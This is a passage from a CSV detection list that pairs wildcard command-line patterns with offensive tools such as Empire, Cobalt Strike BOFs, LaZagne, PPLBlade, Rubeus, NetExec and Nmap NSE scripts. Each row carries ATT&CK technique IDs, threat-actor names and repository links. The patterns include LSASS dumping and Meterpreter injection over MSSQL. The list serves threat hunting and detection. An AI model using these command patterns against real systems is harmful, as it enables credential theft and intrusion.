Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* -mDNSTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* membase-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* membase-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* memcached-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* memorpy *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -* memreader.c *,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -* MemReader_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,0,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -* merlin.py *,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -* met_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* metasploit-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* metasploit-msgrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* metasploit-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -method * -nthash *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -* Microsploit.sh*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,0,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -* mikrotik-routeros-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mimikittenz*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* mmouse-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mmouse-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* modbus-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --mode decrypt --dumpname *.dmp --key *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode dump --name *.exe --handle procexp --obfuscate*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode dump --name lsass.exe*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode proxy --ghidra *--dll *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -* mongodb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mongodb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mongodb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* monitor /interval:* /filteruser:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* moodlescan -r -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* mqtt-subscribe.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mrinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* MS15-034.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* ms17010 -i *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* ms17010 -n *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* msfdb run *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* --msfoptions *,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* --msf-path*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* Mshikaki.cpp*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,0,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -* msrpc-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mssql * -u * -p * -M met_inject*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* mssql * -u * -p * -M mssql_priv*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* mssql * -u * -p * -M web_delivery *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ms-sql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-dac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-hasdbaccess.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-xp-cmdshell.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mtrace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* murmur-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - 